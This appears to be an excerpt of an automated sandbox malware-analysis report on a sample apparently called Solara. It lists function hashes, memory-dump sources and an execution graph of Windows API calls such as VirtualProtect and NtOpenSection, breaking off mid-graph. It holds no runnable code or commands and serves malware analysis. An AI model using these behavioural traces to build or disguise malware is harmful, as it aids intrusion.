                                                                                                    • Associated: 00000007.00000002.1533359928.00007FF6284AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.1533392164.00007FF6284AF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.1533434079.00007FF6284B0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.1534093445.00007FF6289A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.1534132810.00007FF6289A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.1534170449.00007FF6289AA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff6284a0000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                                                    • Instruction ID: 630af235e7fb7f796a78684395ce7e51aa2c52e1c1e13240bac3ed421e8843d5
                                                                                                    • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                                                    • Instruction Fuzzy Hash: 75B01234D0830986FB002F61DC9135832606B0C740F400032C50C4F352DE7D54404B17

                                                                                                    Executed Functions

                                                                                                    Function 00007FFAAC23F3EA Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1698440189.00007FFAAC23D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC23D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac23d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0fO
                                                                                                    • API String ID: 0-167848699
                                                                                                    • Opcode ID: 9d27ea1479834fc1a118fff5d816605d0981bed3cb37231ad1df4f1b523e5ccc
                                                                                                    • Instruction ID: b8530b699ddff56fec92a608132e97f1889d8b2e2163fdbef7c94750388c2a9b
                                                                                                    • Opcode Fuzzy Hash: 9d27ea1479834fc1a118fff5d816605d0981bed3cb37231ad1df4f1b523e5ccc
                                                                                                    • Instruction Fuzzy Hash: 23514B6650EBC58FE753AB3868655513FB0AF1321070E45EBC188CF2E7E5299C0DC7A2
                                                                                                    Function 00007FFAAC35BD58 Relevance: .7, Instructions: 690COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 413704029d6677baf32bb250c13ee4f4507ac598c7eea9b05c0a14effaa3c9fe
                                                                                                    • Instruction ID: 9d45b48135ba9de15faabe9ac7fc4ba01e177becabeeceffcbf705e07052724b
                                                                                                    • Opcode Fuzzy Hash: 413704029d6677baf32bb250c13ee4f4507ac598c7eea9b05c0a14effaa3c9fe
                                                                                                    • Instruction Fuzzy Hash: B022D331A18A4D8FEB98DF58C495EA9BBE1FF59304F14416ED04EC7296CA34E846CBD0
                                                                                                    Function 00007FFAAC426605 Relevance: .4, Instructions: 442COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1701261046.00007FFAAC420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac420000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24fff4cb0a37fc32de08f643d2124e2c40f283352b5d31110cecb5d7f13834ae
                                                                                                    • Instruction ID: f0e2a5dff263679429ba651b294ac24454772e0bcb18f652ff953aafdcb5a881
                                                                                                    • Opcode Fuzzy Hash: 24fff4cb0a37fc32de08f643d2124e2c40f283352b5d31110cecb5d7f13834ae
                                                                                                    • Instruction Fuzzy Hash: 1BD1466990EBC98FF755EB28881A9F5BFA1EF66214B0841FED04DC7093E918DC09C395
                                                                                                    Function 00007FFAAC359FE0 Relevance: .4, Instructions: 371COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6b7b95c2f76ff094f12d44ef049813e8a3bde2693575a5578fba38cc9b99049d
                                                                                                    • Instruction ID: accf2e088dc0e6d63ab43896d408c0e1093feac4f53074287c108ca495b7e6bd
                                                                                                    • Opcode Fuzzy Hash: 6b7b95c2f76ff094f12d44ef049813e8a3bde2693575a5578fba38cc9b99049d
                                                                                                    • Instruction Fuzzy Hash: DA51D76390EBC68FE3025768AC7A8F57FA0DF13255B0C40FBD0C99B1A3E919545987E2
                                                                                                    Function 00007FFAAC359D48 Relevance: .2, Instructions: 220COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 644c637c9c2aee85d667a491fce84172b1f21b2221b84190259b1f38f87e16af
                                                                                                    • Instruction ID: 5b7ecaaba38faf9b812c670214b7d1fc4fbe286d4dd58e45c7339d6a75c1edfb
                                                                                                    • Opcode Fuzzy Hash: 644c637c9c2aee85d667a491fce84172b1f21b2221b84190259b1f38f87e16af
                                                                                                    • Instruction Fuzzy Hash: 99F0BE3080DA8C8FDB45DF2888199E5BFE0EF26200B0401EBE84DC7061DA65D918D7C1
                                                                                                    Function 00007FFAAC424073 Relevance: .2, Instructions: 183COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1701261046.00007FFAAC420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac420000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6a98fc97a751aac22e780b20256cf2bc10a58a90a63d6923551e7a777818268
                                                                                                    • Instruction ID: e9fc26ace6f6f08644bb8ece3e78bca1c8594b50e072172c6c62e6d5acac8e84
                                                                                                    • Opcode Fuzzy Hash: b6a98fc97a751aac22e780b20256cf2bc10a58a90a63d6923551e7a777818268
                                                                                                    • Instruction Fuzzy Hash: 9B517B36A0DE868FF799DB1C841A67477D2DF96214B1840BEC14EC7193ED18EC098388
                                                                                                    Function 00007FFAAC424370 Relevance: .1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1701261046.00007FFAAC420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac420000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7ac09eccb72ddd08854216dd0043fcf22187d1bd16c55635c2e7587ee502de56
                                                                                                    • Instruction ID: a8f8af2f1ccdf2edfd8df03f8f9e1d7a00b69e3296fc205cddbd544f5542d611
                                                                                                    • Opcode Fuzzy Hash: 7ac09eccb72ddd08854216dd0043fcf22187d1bd16c55635c2e7587ee502de56
                                                                                                    • Instruction Fuzzy Hash: 15412632B0EA898FF7A9D76C94169B47BD1EF42224B0855BAC14EC7593ED18EC1883C5
                                                                                                    Function 00007FFAAC359748 Relevance: .1, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5c59a51fd971c40551bdc8d6871a6a43c7879f7e78ba5e2cc5452a804ca5bfd2
                                                                                                    • Instruction ID: c7fade73fce85c546f1012030fb05df58dd543dd8968b05487f64f1a8c941822
                                                                                                    • Opcode Fuzzy Hash: 5c59a51fd971c40551bdc8d6871a6a43c7879f7e78ba5e2cc5452a804ca5bfd2
                                                                                                    • Instruction Fuzzy Hash: A541FE7191CF4C8FEB589F5CA84A6A97BE0FB55311F04816FE04993252DA30A856CBC2
                                                                                                    Function 00007FFAAC35B1E5 Relevance: .1, Instructions: 118COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1a24c8a7c0faa480b13c052b330b77678116c92624ee4790168614126287423
                                                                                                    • Instruction ID: a3c306c3c72cdfb17cd142dfe174194b098a442227a3fe72bf8f0de8a7a79681
                                                                                                    • Opcode Fuzzy Hash: f1a24c8a7c0faa480b13c052b330b77678116c92624ee4790168614126287423
                                                                                                    • Instruction Fuzzy Hash: 8031267080DB8C8EDB55DBA89849AEA7FE4DB57321F04816FD08CC7053D624541AC7A2
                                                                                                    Function 00007FFAAC4240BF Relevance: .1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1701261046.00007FFAAC420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac420000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb7322ce0f09fce2359d285a2f2c7f18a87822d2d60d8cd15aeabcedd2b9e6ff
                                                                                                    • Instruction ID: 75fac3090936c77d01ba440952663cf50c48799a169d5962a814b14fe41f66ae
                                                                                                    • Opcode Fuzzy Hash: bb7322ce0f09fce2359d285a2f2c7f18a87822d2d60d8cd15aeabcedd2b9e6ff
                                                                                                    • Instruction Fuzzy Hash: D1215C3690FA878FF399DB1C845E53076D2EF52218B4990BAC04EC71E3ED18DC088388
                                                                                                    Function 00007FFAAC4243BC Relevance: .1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1701261046.00007FFAAC420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac420000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94bcfefef1b288af357e087e7a1847bda20a733d4f0b20f9b862fed0449ff9a5
                                                                                                    • Instruction ID: f5fc5d5d70e9feaae07f0d6b9ce2144c3e0653a10b4fbeab9636e8bc37352d0a
                                                                                                    • Opcode Fuzzy Hash: 94bcfefef1b288af357e087e7a1847bda20a733d4f0b20f9b862fed0449ff9a5
                                                                                                    • Instruction Fuzzy Hash: B4110636A0E6858FF7A5E728945A9B47BD0EF0231875950F6D05DC7093EE19EC088785
                                                                                                    Function 00007FFAAC3533B5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction ID: a2b03d6ea09e9dc6ca981751c2fcdba422378a0899b292267955062f3f70c447
                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction Fuzzy Hash: A701677111CB0C8FD744EF0CE455AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                    Function 00007FFAAC35BFC3 Relevance: .0, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e676b88deb46bb92276d7873ffcb2620f92253ba5664c50bab22f3e5c88293de
                                                                                                    • Instruction ID: b9778acc04eb86aacff8c4d2d89cdef021fc579f618bcffeb22601011d16be7e
                                                                                                    • Opcode Fuzzy Hash: e676b88deb46bb92276d7873ffcb2620f92253ba5664c50bab22f3e5c88293de
                                                                                                    • Instruction Fuzzy Hash: 85F0303275C7044FDB4CAA1CF842DB573D1E799334B10026EE48BC2656D927E8838A85
                                                                                                    Function 00007FFAAC35C008 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 833b36e5ac0400503f9dda138b9b0031255c2190ea0a18dc5e69f4cd369d6f2b
                                                                                                    • Instruction ID: 9ea62193ed485bad2bb3095e90ef9ecba2abb8bc070b817902d37f9b2556e227
                                                                                                    • Opcode Fuzzy Hash: 833b36e5ac0400503f9dda138b9b0031255c2190ea0a18dc5e69f4cd369d6f2b
                                                                                                    • Instruction Fuzzy Hash: B5F0373275C6058FDB4CAA1CF442DB573D1EB95324B10416EE48BC2696D917F8868A85

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFAAC358B69 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.1699833399.00007FFAAC350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC350000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ffaac350000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L_^7$L_^8$L_^?$L_^@$L_^F
                                                                                                    • API String ID: 0-3711972127
                                                                                                    • Opcode ID: 39592ec284b65dd03cd07572f9e3ecdc581d1a3bd4dfa3c4944b5edc734cc767
                                                                                                    • Instruction ID: 4439caebf78c659a4e2720f1a2a318cda827442e619def109a06496288665e9b
                                                                                                    • Opcode Fuzzy Hash: 39592ec284b65dd03cd07572f9e3ecdc581d1a3bd4dfa3c4944b5edc734cc767
                                                                                                    • Instruction Fuzzy Hash: 814159A370951549DA013B7CF811DED7740DF9427974881B6D78DCE163ED25708B8AE1

                                                                                                    Executed Functions

                                                                                                    Function 00007FF65D131140 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.1581001372.00007FF65D131000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65D130000, based on PE: true
                                                                                                    • Associated: 00000029.00000002.1580276634.00007FF65D130000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1581399133.00007FF65D13C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1581637637.00007FF65D13F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1585523921.00007FF65D3BE000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1586501055.00007FF65D634000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1586550824.00007FF65D637000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1586586009.00007FF65D63A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_7ff65d130000_rdqanwpudvuj.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                                                    • Instruction ID: 2541eae0e2babf385aa73b91a2eb9f320ae0aebffc5a39e9c6dee68fa2106ea1
                                                                                                    • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                                                    • Instruction Fuzzy Hash: E2B01274D0D34B84EB102F51D84139832716B08740F540430C80CA33D2DF7D50804B10

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.2%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:3.1%
                                                                                                    Total number of Nodes:897
                                                                                                    Total number of Limit Nodes:2
                                                                                                    execution_graph 2986 140001ac3 2987 140001a70 2986->2987 2988 14000199e 2987->2988 2989 140001b36 2987->2989 2992 140001b53 2987->2992 2991 140001a0f 2988->2991 2993 1400019e9 VirtualProtect 2988->2993 2990 140001ba0 4 API calls 2989->2990 2990->2992 2993->2988 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2099 140001bc2 2098->2099 2100 140001c04 memcpy 2099->2100 2102 140001c45 VirtualQuery 2099->2102 2103 140001cf4 2099->2103 2100->2096 2102->2103 2107 140001c72 2102->2107 2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 2106 140001ca4 VirtualProtect 2106->2100 2106->2104 2107->2100 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006640 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtOpenSection 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2217 140002218 2212->2217 2215 14000220b LeaveCriticalSection 2213->2215 2220 14000212e 2213->2220 2214 140002272 2215->2217 2216 140002241 DeleteCriticalSection 2216->2214 2217->2214 2217->2216 2219 140002230 free 2217->2219 2218 14000214d TlsGetValue GetLastError 2218->2220 2219->2216 2219->2219 2220->2215 2220->2218 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2994 140001f47 2995 140001e67 signal 2994->2995 2996 140001e99 2994->2996 2995->2996 2997 140001e7c 2995->2997 2997->2996 2998 140001e82 signal 2997->2998 2998->2996 2113 14000216f 2114 140002178 InitializeCriticalSection 2113->2114 2115 140002185 2113->2115 2114->2115 2116 140001a70 2117 14000199e 2116->2117 2121 140001a7d 2116->2121 2118 140001a0f 2117->2118 2119 1400019e9 VirtualProtect 2117->2119 2119->2117 2120 140001b53 2121->2116 2121->2120 2122 140001b36 2121->2122 2123 140001ba0 4 API calls 2122->2123 2123->2120 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 2999 140002050 3000 14000205e EnterCriticalSection 2999->3000 3001 1400020cf 2999->3001 3002 1400020c2 LeaveCriticalSection 3000->3002 3003 140002079 3000->3003 3002->3001 3003->3002 3004 1400020bd free 3003->3004 3004->3002 3005 140001fd0 3006 140001fe4 3005->3006 3007 140002033 3005->3007 3006->3007 3008 140001ffd EnterCriticalSection LeaveCriticalSection 3006->3008 3008->3007 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 140001b36 2239->2240 2242 14000199e 2239->2242 2245 140001b53 2239->2245 2241 140001ba0 4 API calls 2240->2241 2241->2245 2243 140001a0f 2242->2243 2244 1400019e9 VirtualProtect 2242->2244 2244->2242 2080 140001394 2084 140006640 2080->2084 2082 1400013b8 2083 1400013c6 NtOpenSection 2082->2083 2085 14000665e 2084->2085 2088 14000668b 2084->2088 2085->2082 2086 140006733 2087 14000674f malloc 2086->2087 2089 140006770 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006be0 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003240 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 76 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2275 14000194d 2274->2275 2279 140001a20 2274->2279 2276 14000199e 2275->2276 2277 140001ba0 4 API calls 2275->2277 2276->2273 2278 1400019e9 VirtualProtect 2276->2278 2277->2275 2278->2276 2279->2276 2280 140001b53 2279->2280 2281 140001b36 2279->2281 2282 140001ba0 4 API calls 2281->2282 2282->2280 2286 140003256 2283->2286 2284 14000339d wcslen 2393 14000153f 2284->2393 2286->2284 2288 14000359e 2288->2265 2291 140003498 2294 1400034be memset 2291->2294 2296 1400034f0 2294->2296 2297 140003540 wcslen 2296->2297 2298 140003556 2297->2298 2302 14000359c 2297->2302 2299 140003570 _wcsnicmp 2298->2299 2300 140003586 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003661 wcscpy wcscat memset 2304 1400036a0 2301->2304 2302->2301 2303 1400036e3 wcscpy wcscat memset 2305 140003726 2303->2305 2304->2303 2306 14000382e wcscpy wcscat memset 2305->2306 2307 140003870 2306->2307 2308 140003bc4 wcslen 2307->2308 2309 140003bd2 2308->2309 2313 140003c0b 2308->2313 2310 140003be0 _wcsnicmp 2309->2310 2311 140003bf6 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003d1a wcscpy wcscat memset 2314 140003d5c 2312->2314 2313->2312 2315 140003d9f wcscpy wcscat memset 2314->2315 2317 140003de5 2315->2317 2316 140003e15 wcscpy wcscat 2318 1400061c2 memcpy 2316->2318 2320 140003e47 2316->2320 2317->2316 2318->2320 2319 140003f9a wcslen 2322 140003fdf 2319->2322 2320->2319 2321 140004044 wcslen memset 2533 14000157b 2321->2533 2322->2321 2324 1400046df memset 2326 14000470e 2324->2326 2325 140004753 wcscpy wcscat wcslen 2574 14000146d 2325->2574 2326->2325 2330 1400046c9 2332 14000145e 2 API calls 2330->2332 2331 14000157b 2 API calls 2366 14000416d 2331->2366 2335 1400046c4 2332->2335 2333 1400048f3 2340 140004932 memset 2333->2340 2335->2324 2337 140004863 2660 1400014a9 2337->2660 2338 14000490f 2344 14000145e 2 API calls 2338->2344 2342 1400062a3 2340->2342 2343 140004956 wcscpy wcscat wcslen 2340->2343 2374 140004a80 2343->2374 2344->2333 2347 1400048ff 2352 14000145e 2 API calls 2347->2352 2348 14000145e 2 API calls 2348->2366 2350 1400044f4 _wcsnicmp 2354 1400046ac 2350->2354 2350->2366 2352->2333 2355 14000145e 2 API calls 2354->2355 2357 1400046b8 2355->2357 2356 1400048e7 2358 14000145e 2 API calls 2356->2358 2361 14000145e 2 API calls 2357->2361 2358->2333 2359 140004552 _wcsnicmp 2359->2354 2359->2366 2360 140004b79 wcslen 2362 14000153f 2 API calls 2360->2362 2361->2335 2362->2374 2363 14000145e NtOpenSection malloc 2363->2374 2364 140005dbf memcpy 2364->2374 2365 1400045a6 _wcsnicmp 2365->2354 2365->2366 2366->2324 2366->2330 2366->2331 2366->2348 2366->2350 2366->2359 2366->2365 2367 140004377 wcsstr 2366->2367 2550 140001599 2366->2550 2563 1400015a8 2366->2563 2367->2354 2367->2366 2368 140004ced 